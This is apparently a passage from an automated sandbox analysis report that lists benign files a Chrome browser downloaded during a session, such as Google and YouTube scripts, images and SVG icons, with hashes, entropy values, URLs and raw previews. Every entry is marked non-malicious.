                                                                                                                                                                                                                                                            SHA1:DE8C33627287A24FECE030C39A9270BDF37AE99F
                                                                                                                                                                                                                                                            SHA-256:95F2122A0FDEB006BDF1B752AEB4444E5DD48C5288029CEE224E4C439DFA8D13
                                                                                                                                                                                                                                                            SHA-512:3B2839A6706D4416969211939C8B8F09F60EE639C5EC8E28DEDCF897D0CB3731FA1D8061234D4C538E3DDD3926D422F3F6E17F4D197998D53C04EFA5409F9A00
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            Preview:.PNG........IHDR...R...............8.IDATx...!.. ...W...-H@24..................................:.F..f....n#.....v.G..f4/..8...............l...5.rr....V.v...j4m...>. ..~...l'.1.r..%<Q....D..%D"...1...........%B<.......S.i.T..4...N%..C...L....SO.}..'.{.fW...r..zn..H.Z....|......a{..[.R..."W.*../&R.r....z"M[.g6.......\........p.....:Z...<...\r.=ID. ].e.v..h\.I".....|..|..B.xz.s.s.F...1.I......G.<....,&.z......e...........]..;..M...p.........5..]dt....b.H]i2..h.(..g...4.....m.D#$i.<4{..'......8z....0.R.4.4$..M)..<...A..h.".y.....4i...RJ.R...d.QC.Zb...q.pH2....g..X.4^..~. ..f..7!$Ig.5.G......B...E..._.E.f.'P.....M.E.gSN...*j3e..^.tx..!..J.s.Z...S..s..g.9.V3..h._+m.D.-3..E.aZ&.L.*....#x".$q=.I.]4+HG.'...~..}....u..(|....@{.RL.Eh. ..,.5>....y..)G....zF.y.....#.h.df...-..8..=...4...."..%+...O..Q.P.|k.~.;.'....l.$........?Ul..T....&8.Dx`hy..2..WZ...T.......Dm.v.......D...kK5.y..!+.....>..O.b..c3u.....h..<.i..8-.....p.H.74...n.9.1>..<J1..x..D..i....MG...
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):455
                                                                                                                                                                                                                                                            Entropy (8bit):5.263945888138197
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:12:k6El6qF5vDytxZWM1UD0IJDHhiXDIyQ9NlpkbRNkN0:k6Pq7vmtxZWM1UHJ1+MysNErkK
                                                                                                                                                                                                                                                            MD5:E3A8351FC379085AE064E0E11F054C0F
                                                                                                                                                                                                                                                            SHA1:73121AEA0904A6A63FE9D36ED42D5283A4B4D51C
                                                                                                                                                                                                                                                            SHA-256:731B29085390D2655689BDA42E62A326C23CF45DA978C47D1CDAC285220EBBFD
                                                                                                                                                                                                                                                            SHA-512:73C57BF36CACAD98636E519CC229BAE572BB093DD53BAD4E6854994B3140357CF98E6708D920B5D1B69EA9F34C28DEC9E0408D1201870C790D93D8B24F5333DE
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:"https://www.gstatic.com/_/mss/boq-translate/_/js/k=boq-translate.TranslateWebserverUi.en.t7_VRwG1YCg.es5.O/ck=boq-translate.TranslateWebserverUi.3Kpn12MAoRc.L.B1.O/am=gemZDQsCAQg/d=1/exm=A7fCU,AJZZxc,AKLKy,AV6dJd,BSwBZd,BVgquf,CHCSlb,COQbmf,CTfTTd,CW8lw,DFTXbf,E2VjNc,EEDORb,EF8pe,EFQ78c,FZTbYc,G0j0Je,GILUZe,GSlykd,GiFjve,Gkrb3e,HgVFRb,HruX3d,HwavCb,I6YDgd,IZT63,Id96Vc,IjTJJb,Izs65d,JE2clc,JH2zc,JNcm2e,JNoxi,JPvYpc,JVNQkc,JWUKXe,K4PcAe,KG2eXe,KOuY1b,KUM7Z,L1AAkb,LEikZe,LFynkb,LP4cEc,M2suMc,MDB2J,MI6k7c,MJWMce,MY2OBe,MaBk4,Mlhmy,MnwvSb,MpJwZc,N2mfec,NotTJb,NufREb,NwH0H,O1Gjze,O6y8ed,OTA3Ae,OmgaI,P6Sgne,PJgxJf,PrPYRd,QIhFr,QKK0O,Qnj3Pe,QqJ8Gd,R6UQsc,RAnnUd,RMhBfe,RqjULd,Ru0Pgb,SNtCZb,SdcwHb,SpsfSb,T8kZcd,TJQ3Ud,Tpj7Pb,TzmfU,U0aPgd,UECOXe,UUJqVe,UWMmZb,Uas9Hd,UfGXTd,Ulmmrd,Un38xf,UthHZe,V3dDOb,V8JnLd,VETAO,VNcg1e,VwDzFe,WCciof,WO9ee,WYNSOe,XBRlNc,XMsnSd,XVMNvd,Xn16n,YrN4Fb,ZH8ved,ZbunN,ZfAoz,ZwDk9d,_b,_r,_tp,a4GDlb,aW3pY,aurFic,bD99Db,bTi8wc,bYHiff,bm51tf,byfTOb,cPVRG,ceo3ne,dmy0Zb,duFQFc,eM1C7d,eYJrS,ehH0Pd,fKBXPe,fKUV3e,fR6Vdb,ff8rzd,fmklff,g8fAWe,gJzDyc,gWGePc,glibvb,gychg,hB8iWe,hKSk3e,hPAkKe,hc6Ubd,hmxKAd,i5dxUd,j4UNFc,jMem0b,jl0Zdc,kWgXee,kjKdXe,lWpni,lazG7b,lsjVmc,lwddkf,m9oV,mI3LFb,mNvcvf,mdR7q,mmcjze,mzzZzc,n391td,n73qwf,nKuFpb,onWwzb,ovKuLd,p8L0ob,pKzUve,pjICDe,pvoWvc,pw70Gc,q0xTif,qRXAtf,rCcCxc,rPRh8e,rSlV0d,s2VbJb,s2XCRc,s39S4,sGhhBd,sJhETb,sOXFj,soHxf,t1sulf,tQX3bd,tQbu0,tjiVBd,u8fSBf,uu7UOe,w9hDv,ws9Tlc,xQtZb,xUdipf,xdp6Ne,xzbRj,yDVVkb,yi1Dad,zbML3c,zr1jrb/excm=_b,_r,_tp,mainview/ed=1/wt=2/rs=ANkVxDlgUx_pEh_72ZiUbycS92nBrlu9eA/ee=cEt90b:ws9Tlc;QGR0gd:Mlhmy;uY49fb:COQbmf;yxTchf:KUM7Z;qddgKe:xQtZb;dIoSBb:SpsfSb;EmZ2Bf:zr1jrb;EVNhjf:pw70Gc;eBAeSb:zbML3c;yEQyxe:p8L0ob;JsbNhc:Xd8iUd;NSEoX:lazG7b;zxnPse:duFQFc;pXdRYb:XBRlNc;oGtAuc:sOXFj;wQlYve:aLUfP;g8nkx:U4MzKc;Pjplud:EEDORb;io8t5d:yDVVkb;Oj465e:KG2eXe;Erl4fe:FloWmf;ul9GGd:VDovNc;sP4Vbe:VwDzFe;a56pNe:JEfCwb;kMFpHd:OTA3Ae;NPKaK:SdcwHb;nAFL3:s39S4;iFQyKf:QIhFr;kbAm9d:MkHyGd;xqZiqf:BBI74;SNUn3:ZwDk9d;LBgRLc:SdcwHb;wR5FRb:O1Gjze/m=rQ304"
                                                                                                                                                                                                                                                            Preview:"use strict";this.default_TranslateWebserverUi=this.default_TranslateWebserverUi||{};(function(_){var window=this;.try{._.k("rQ304");.var AS=function(a){_.jw.call(this,a.va)};_.C(AS,_.jw);AS.qa=_.jw.qa;AS.prototype.Hc=function(){return"rQ304"};AS.prototype.Gd=function(){return!0};AS.prototype.Ic=function(){return _.zS};_.iw(_.gsa,AS);_.Dv.rQ304=_.Nz;._.p();.}catch(e){_._DumpException(e)}.}).call(this,this.default_TranslateWebserverUi);.// Google Inc..
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (2324)
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):97027
                                                                                                                                                                                                                                                            Entropy (8bit):5.465699824958578
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:1536:la3ky4g6ma6PRYy9VKDMus+FwIHzaZDbcyqmf2XSu1DpJdFhmT10KSBEkLH:t3z2ODPytZnhlAHDpJdXKS3
                                                                                                                                                                                                                                                            MD5:8DCED92EB242738DE245EBB35F6AC703
                                                                                                                                                                                                                                                            SHA1:6D8B49B161817917A1BEEE36904A2A3A1DEC2BC6
                                                                                                                                                                                                                                                            SHA-256:91428F2380D927550322021A99670A8B385D0A493B16A71BCE137CB420D6DAB9
                                                                                                                                                                                                                                                            SHA-512:93D4E8DBCC4C95D3B92E65F434DEEC712C7536644C697C450E3B7A044FB61236C9CE449F3898D8B7B49E11E741A2740CFAA37986CA78BD96B0D74F407F4F52BD
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:https://www.gstatic.com/feedback/js/help/prod/service/lazy.min.js
                                                                                                                                                                                                                                                            Preview:(function(){/*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/.var m,aa=function(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}},ba="function"==typeof Object.defineProperties?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a},ca=function(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");.},da=ca(this),r=function(a,b){if(b)a:{var c=da;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&null!=b&&ba(c,a,{configurable:!0,writable:!0,value:b})}};.r("Symbol",function(a){if(a)return a;var b=function(f,g){this.nc=f;ba(this,"description",{configurable:!0,writable:!0,value:g})};b.prototype.toString=function
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (2379)
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):181358
                                                                                                                                                                                                                                                            Entropy (8bit):5.528462358112877
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3072:H1z5OCXeUvKK8GaP8cU00aLhBQkomqoCza32ZnTPZ0bieXGtOVX+:HXeUvK9GaP8ULfPjqHza3gTQGteO
                                                                                                                                                                                                                                                            MD5:C9ED624D023AECD330DA8CCD4662AD7E
                                                                                                                                                                                                                                                            SHA1:D804FCD304ECA1EBF47DE03D1272B3605DA69172
                                                                                                                                                                                                                                                            SHA-256:8E641DB6397AB7945116CB5B81C3DF47A3F545B4C5D4BE6823A339FE351D575F
                                                                                                                                                                                                                                                            SHA-512:E84C710026DE962353732FEAD56650CA5664E69DCFED30D5C86F6FFC823F1B01209BBCF054736A2EEEA2639D5E3A964DF8AAB3228C9E7EE911C26F4D5306883A
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:https://www.googletagmanager.com/gtag/js?id=G-H30R9PNQFN
                                                                                                                                                                                                                                                            Preview:.// Copyright 2012 Google Inc. All rights reserved..(function(){..var data = {."resource": {. "version":"1",. . "macros":[{"function":"__e"},{"function":"__c","vtp_value":"undefined"},{"function":"__c","vtp_value":"google.ch"},{"function":"__c","vtp_value":0},{"vtp_signal":0,"function":"__c","vtp_value":0}],. "tags":[{"function":"__gct","vtp_trackingId":"G-H30R9PNQFN","vtp_sessionDuration":0,"tag_id":1},{"function":"__zone","vtp_childContainers":["list",["map","publicId","UA-175894890-5"]],"vtp_enableConfiguration":false,"tag_id":3},{"function":"__set_product_settings","vtp_instanceDestinationId":"G-H30R9PNQFN","vtp_foreignTldMacroResult":["macro",2],"vtp_isChinaVipRegionMacroResult":["macro",3],"tag_id":9},{"function":"__ogt_google_signals","vtp_googleSignals":"DISABLED","vtp_instanceDestinationId":"G-H30R9PNQFN","vtp_serverMacroResult":["macro",4],"tag_id":11}],. "predicates":[{"function":"_eq","arg0":["macro",0],"arg1":"gtm.js"},{"function":"_eq","arg0":["macro",0],"arg1":"gtm.
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:PNG image data, 2048 x 853, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):211918
                                                                                                                                                                                                                                                            Entropy (8bit):7.889870909942964
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3072:edNUzkNkYQ7+8ZZgFifK3xaF4557FrSOw2yMOGWk8HqyJGvWvXnt76GNUlXKf/6A:+UwWH7gxhayD7IOtNJ8KyqynbuG/h7pt
                                                                                                                                                                                                                                                            MD5:EBEA4C0C09EFCFA9102598E91BA2998C
                                                                                                                                                                                                                                                            SHA1:B45C7B9B7B419AFCEB47783D78F58191B468E67F
                                                                                                                                                                                                                                                            SHA-256:E7931FBB991A842C47EBEEE0C3B2FD0682362EC8265D8BFB6F0825FBF603BA6A
                                                                                                                                                                                                                                                            SHA-512:14434B5BFE869BEC3D45553304EAEFAEBF801F8F404A6BBFEABA3F747136286DEB907318B8F7B2A87AD78FA4550D25BCC8EFE1987DA26DB504F2C07D9467D9D5
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            Preview:.PNG........IHDR.......U.............sRGB....... .IDATx^...\Ev..n.I.....$!..Y.X`IK.Q..q.u.....^{...<?/9#r.KZ2... @.,......hf:w...Q.zf:.{..Uu.....ZSu...{j.~.......2.P..r.'g.8h.4m...v.. ........"....T.N.ti.D.@..nh..t*.8.../X..........d...<......D9WN..{{.D...J....?JUW....f.=...........#Pf..4J...?VhN..oM.:b.-..Q.b..r....S..M...... .>....\v..9z..@6G..e5_..;...\....e!..2.... ..J...L.. ............;?-.9... .. .....t.^..?.#.O...D.E..Q.X`.9.+_5.z..o ....@.....k*....L....*.Px..u....p....?.:..@...%..`.,.R.v""....3C............D......X7~#.. G)...i..>.@.L...$3Iz...#..?...........?...@.<.Q......~!....7..rY.?....B].....7.>...I&./....\&..~.....zQ.....Ya.. .. .. ..}..^...C..?.#Xq..pU..pt..0y.)4k..]..-...e...s.)4k....:xt.......\....@.*......).....0..Ha..@..$# ...dC.; .......?-.....'H.l.........(G.T.....d#Rn9..a...Yj...6./.v.5F.]..-..P.....K..&..AG ......./.6G@U...E.......C-....P...d......5..._.B.X. 2.m%.V<A].........?....@...E]..U?....nt.......3.#]..B..]1.jW....
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):1719
                                                                                                                                                                                                                                                            Entropy (8bit):4.4003431597789415
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:48:9/S90MU5IahYdmMqPLmumqrYX3DyZ/jTq98:920MUSahYdmM5qrYHw/jmi
                                                                                                                                                                                                                                                            MD5:7E4968170175907C71DC14EC4841ACAB
                                                                                                                                                                                                                                                            SHA1:C9010640A0CC81506E9721E69E0A508ECFBEAA0A
                                                                                                                                                                                                                                                            SHA-256:D7CE0FF7DA59E9040AC54917098C68952C6B4B849ABFF732908008E20E8DF18B
                                                                                                                                                                                                                                                            SHA-512:A709A66A26B7BAB6511131B89396AE88AF1BD0B8E16B72447B8FEEF3A8D4663670752D3207650456580130111B5D797B3B59E0C739F9CE6BD4D1D5F34C926E9D
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            Preview:<svg id="google-color-logo" width="74" height="24" viewBox="0 0 74 24" xmlns="http://www.w3.org/2000/svg"><path fill="#4285F4" d="M9.24 8.19v2.46h5.88c-.18 1.38-.64 2.39-1.34 3.1-.86.86-2.2 1.8-4.54 1.8-3.62 0-6.45-2.92-6.45-6.54s2.83-6.54 6.45-6.54c1.95 0 3.38.77 4.43 1.76L15.4 2.5C13.94 1.08 11.98 0 9.24 0 4.28 0 .11 4.04.11 9s4.17 9 9.13 9c2.68 0 4.7-.88 6.28-2.52 1.62-1.62 2.13-3.91 2.13-5.75 0-.57-.04-1.1-.13-1.54H9.24z"></path><path fill="#EA4335" d="M25 6.19c-3.21 0-5.83 2.44-5.83 5.81 0 3.34 2.62 5.81 5.83 5.81s5.83-2.46 5.83-5.81c0-3.37-2.62-5.81-5.83-5.81zm0 9.33c-1.76 0-3.28-1.45-3.28-3.52 0-2.09 1.52-3.52 3.28-3.52s3.28 1.43 3.28 3.52c0 2.07-1.52 3.52-3.28 3.52z"></path><path fill="#4285F4" d="M53.58 7.49h-.09c-.57-.68-1.67-1.3-3.06-1.3C47.53 6.19 45 8.72 45 12c0 3.26 2.53 5.81 5.43 5.81 1.39 0 2.49-.62 3.06-1.32h.09v.81c0 2.22-1.19 3.41-3.1 3.41-1.56 0-2.53-1.12-2.93-2.07l-2.22.92c.64 1.54 2.33 3.43 5.15 3.43 2.99 0 5.52-1.76 5.52-6.05V6.49h-2.42v1zm-2.93 8.03c-1.76 0-3.1-
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:PNG image data, 660 x 259, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):29482
                                                                                                                                                                                                                                                            Entropy (8bit):7.981667322512288
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:768:9GTC2+KFoZgqPDaPRRBS3e0OWGEllG+NOgNL34IQoJtcn:YTP+QofiRRBrHWVloU134Ipe
                                                                                                                                                                                                                                                            MD5:5E8C4E7B94C84AC6741F0B4F6B6494DD
                                                                                                                                                                                                                                                            SHA1:ABF9239240DDE7DB62AA7DBA97AF4EE578B3D901
                                                                                                                                                                                                                                                            SHA-256:AC2C69E9F7D74922F4B623DCF8B6352E3AD580FF6195B3693EA8446D99B9BA66
                                                                                                                                                                                                                                                            SHA-512:F54CD3D4F04B57487C8D48E412383707D002AA0EB828793AB443FA0B450883DCF805A75F876888BABA8CAAB766B9CE6E49CA5717E7F461C088C670EF587B70B4
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            Preview:.PNG........IHDR..............&......sBIT.....O...._zTXtRaw profile type APP1.....JO.K-.LV((.O..I.R..c...K.K.D......04006..F@.9T(......Y......1....H...:.C2.. .IDATx...w|..........%.....$.".T@..a...(V.w..._.....;(.b.........M%......T.&.{%...?$..L....gH.....0..$....`..a..~X.f..a...7.0..$.....a.&....0..0...o.a..I0,x3..0L.a..a..a......0..`X.f..a...7.0..$.....a.&....0..0...o.a..I0,x3..0L.a..a..a......0..`X.f..a...7.0..$.....a.&....0..0...o.a..I0,x3..0L.a..a..a......0..`X.f..a...7.0..$.....a.&....0..0...o.a..I0,x3..0L.a..a..a......0..`X.f..a..#....hP....0...:.....$.m.M.!.7.a.D..7..@.....Q.........]~...q...Jl6.t..@..............Dh(Dkj.....^m....."h...N..6~.0.........}..E....|~..;......d....k...ZT......(....7.~....x...3../.0L.#.X..a.....O....Z.....M].xw*..B.Zy.ZQ!..*.W+..P.. h.l;x.#g....o............../>.\...d..i.WQUQ...f.U>|..A.R3`c.l.....0uF..b.R....-..1.mK.X7.0h m....[.Y.d-A.<.n..0.a..a....>....Lx.r.y......f...D.u..s.IOM .#..g...0.b..a.L..h'..G.d...k.3.x"Y.C?..y
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:PNG image data, 1000 x 400, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):171779
                                                                                                                                                                                                                                                            Entropy (8bit):7.976016019340182
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3072:dfPY4FdhdHgLCgYQYL3zqYjevvImmGxlzS6PM8AZ16s5lJ1Jefpg6P6THbo:dXFDeLpYx32Yj9dYzM8C1pnJT/t7o
                                                                                                                                                                                                                                                            MD5:03F36C26143FDC7F1DAC72071157BEC0
                                                                                                                                                                                                                                                            SHA1:8F1B104F2F8AF306322141022AB17F1A1BE98DCB
                                                                                                                                                                                                                                                            SHA-256:3967A2828CC0A6A4C78B36DC098E1335354C73376B1A6E29A4E0706D867454AF
                                                                                                                                                                                                                                                            SHA-512:811BC1E52408E49E3418FF92CE925D875FF32D52B3446EBE3E7CB063B965D67EC4B72BE19095E6E810A95F6BCCD548706B1B282E7E2A45BA1A1C1DF5C6495A13
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:https://www.google.com/logos/doodles/2019/gamila-el-alailys-112th-birthday-6036329396699136-2x.png
                                                                                                                                                                                                                                                            Preview:.PNG........IHDR................S....PLTE.......................................................................................................................................................}..z....z....p..t..w..l..s.......p..m...}k.{i......yg....p.......xf............ve...uc.tb.s`~q`...{l|o^mcWrj]zm\_\RWUN:7;g`Uyqcd_UhcXum_..}vhofZJIENOJNMG516]YOSRLkaVZRF\UJl_Qlh\ZXPWSKZUMd]SBDBb[P><@QJ@`TGoaRILJthXEGFD@8JE=UOD...i]OSPIfZLcWIreUYMAwkZ$.&..._YM....../)0......{.|......irq..................a^`.........p..K.....hozx.....V......eooKQQQST............Y```gg\ddNHOv..bkkV\\...jvuE@Fr.~RXX{................................z.......z......o....}.........h.q..e.t[.r`....m..t.y....gD.\8.7..P1.I*~ ..u..i.{Y.oL.t*.g...e..^...qv<.X.D.{8.C............J....IDATx....r.0.D.n..?.....Fg.S....,..O.....f}I..z...D_M)...n.m.R2NdF..RJ)...$..J).M.Z.9....@nG7`.f.$R.l.B.....H.].....a........K.........(..#....g.VA...Z..R..]F<sA.d.m.xjf
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):14116
                                                                                                                                                                                                                                                            Entropy (8bit):4.65552037622446
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:384:xkV/Jtv95PDg1g0Sx3Leu4UX644Y48TeJKCR3jIL3n4Z:xkV/JtvPca0Sxbeu4UX644Y46KKCR3Au
                                                                                                                                                                                                                                                            MD5:AD4439B83B65F1CA4CD6C81178DBC6A5
                                                                                                                                                                                                                                                            SHA1:F505AF59D6CD81DA9C153622F7F09ABE812073B6
                                                                                                                                                                                                                                                            SHA-256:254A7C313076C3CBD2A21E78C9C9762DBEDFF5F3D21CAC6090A8C4F67334E942
                                                                                                                                                                                                                                                            SHA-512:690AC84ED5CC5C3BB34CA3207401E601CD065CE8725AC5A50219962108F15BE64CAA09C8D2D07ECD159B2A32330F27A6061FA18027379D574200B9813AC68D2C
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            Preview:<svg xmlns="http://www.w3.org/2000/svg">. <defs>. <svg id="chevron-left" viewBox="0 0 24 24"><path d="M16.41 5.41L15 4l-8 8 8 8 1.41-1.41L9.83 12"></path></svg>. <svg id="chevron-right" viewBox="0 0 24 24"><path d="M7.59 18.59L9 20l8-8-8-8-1.41 1.41L14.17 12"></path></svg>. <svg id="expand-less" viewBox="0 0 24 24"><path d="M18.59 16.41L20 15l-8-8-8 8 1.41 1.41L12 9.83"></path></svg>. <svg id="expand-more" viewBox="0 0 24 24"><path d="M5.41 7.59L4 9l8 8 8-8-1.41-1.41L12 14.17"></path></svg>. <svg id="arrow-back" viewBox="0 0 24 24"><path d="M20 11H7.83l5.59-5.59L12 4l-8 8 8 8 1.41-1.41L7.83 13H20v-2z"></path></svg>. <svg id="arrow-forward" viewBox="0 0 24 24"><path d="M12 4l-1.41 1.41L16.17 11H4v2h12.17l-5.58 5.59L12 20l8-8-8-8z"></path></svg>. <svg id="arrow-upward" viewBox="0 0 24 24"><path d="M4 12l1.41 1.41L11 7.83V20h2V7.83l5.58 5.59L20 12l-8-8-8 8z"></path></svg>. <svg id="arrow-downward" viewBox="0 0 24 24"><path d="M20 12l-1.41-1.41L13 16.17V4h-2v12.17l
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (591)
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):188411
                                                                                                                                                                                                                                                            Entropy (8bit):5.60327255595511
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:1536:1YFNvaJiwjzyXpx3mTu6SI/LLXABmt05WDfD3/ExLSGJkQUM9mTbV1rBJRRYRKFZ:vJpLlDYxCpYZcOy060qgc
                                                                                                                                                                                                                                                            MD5:F591866C7D20E38C7D6EAA7C5DD3579C
                                                                                                                                                                                                                                                            SHA1:B12C3C04C456C0E542BCA9D2CB1F49985C03246D
                                                                                                                                                                                                                                                            SHA-256:8AFC8C47E931FE3CB0FD970CE36DBEB54F82C8DD1E5DF1F8DFD820FD3C78662B
                                                                                                                                                                                                                                                            SHA-512:685E56344010A33DAD9FF13EF243E43B56764A495BFA01258A62F408FB7BFBF56280A4972AC63AC99AB3F5CC7F6F7702DAB959BB046C9EAA52B052E525D1F8D0
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:https://www.youtube.com/s/player/59acb1f3/www-widgetapi.vflset/www-widgetapi.js
                                                                                                                                                                                                                                                            Preview:(function(){/*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/.'use strict';var q;function aa(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}.var da="function"==typeof Object.defineProperties?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};.function ea(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");}.var fa=ea(this);function t(a,b){if(b)a:{var c=fa;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&null!=b&&da(c,a,{configurable:!0,writable:!0,value:b})}}.t("Symbol",function(a){function b(f){if(this instanceof b)throw new TypeError("Symbol is not a constructor");return new c(d+(f||"")+"_"+e+
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):1150
                                                                                                                                                                                                                                                            Entropy (8bit):4.843973639113718
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:24:t4AQfefQRbjloRR4dY4G6gI4ds2EaFinQtsy1xClrz:m2fQSupG6b4G2bFO7z
                                                                                                                                                                                                                                                            MD5:DF9605D6E9CD696C38649677BB1083E2
                                                                                                                                                                                                                                                            SHA1:5858C4CFFF7431B6704B28EA0832244FBF55F78F
                                                                                                                                                                                                                                                            SHA-256:886E58CA5DDD755FA1A3D120BC10893EF6FA1A49315E44D1C7792292753F0DDC
                                                                                                                                                                                                                                                            SHA-512:60F2135359011F3DF616C4D8A030439DCABD982C1F8903C64A00A0E3CD2A7AAE2780D5635B0E08899A89858F199D18913A0ED8169BED1C635C9A498B18DF6C66
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            Preview:<svg xmlns="http://www.w3.org/2000/svg" enable-background="new 0 0 192 192" height="192" viewBox="0 0 192 192" width="192"><rect fill="none" height="192" width="192"/><g><circle cx="96" cy="104.15" fill="#4285F4" r="28"/><path d="M160,72v40.15V136c0,1.69-0.34,3.29-0.82,4.82v0v0c-1.57,4.92-5.43,8.78-10.35,10.35h0v0 c-1.53,0.49-3.13,0.82-4.82,0.82H66l16,16h50h12c4.42,0,8.63-0.9,12.46-2.51c3.83-1.62,7.28-3.96,10.17-6.86 c1.45-1.45,2.76-3.03,3.91-4.74c2.3-3.4,3.96-7.28,4.81-11.44c0.43-2.08,0.65-4.24,0.65-6.45v-12V96.15V84l-6-19l-10.82,2.18 C159.66,68.71,160,70.31,160,72z" fill="#EA4335"/><path d="M32,72c0-1.69,0.34-3.29,0.82-4.82c1.57-4.92,5.43-8.78,10.35-10.35C44.71,56.34,46.31,56,48,56 h96c1.69,0,3.29,0.34,4.82,0.82c0,0,0,0,0,0L149,45l-17-5l-16-16h-13.44H96h-6.56H76L60,40H48c-17.67,0-32,14.33-32,32v12v20l16,16 V72z" fill="#4285F4"/><path d="M144,40h-12l16.83,16.83c1.23,0.39,2.39,0.93,3.47,1.59c2.16,1.32,3.97,3.13,5.29,5.29 c0.66,1.08,1.2,2.24,1.59,3.47v0L176,84V72C176,54.33,161.67,40,144
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:MS Windows icon resource - 2 icons, 16x16, 32 bits/pixel, 32x32, 32 bits/pixel
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):5430
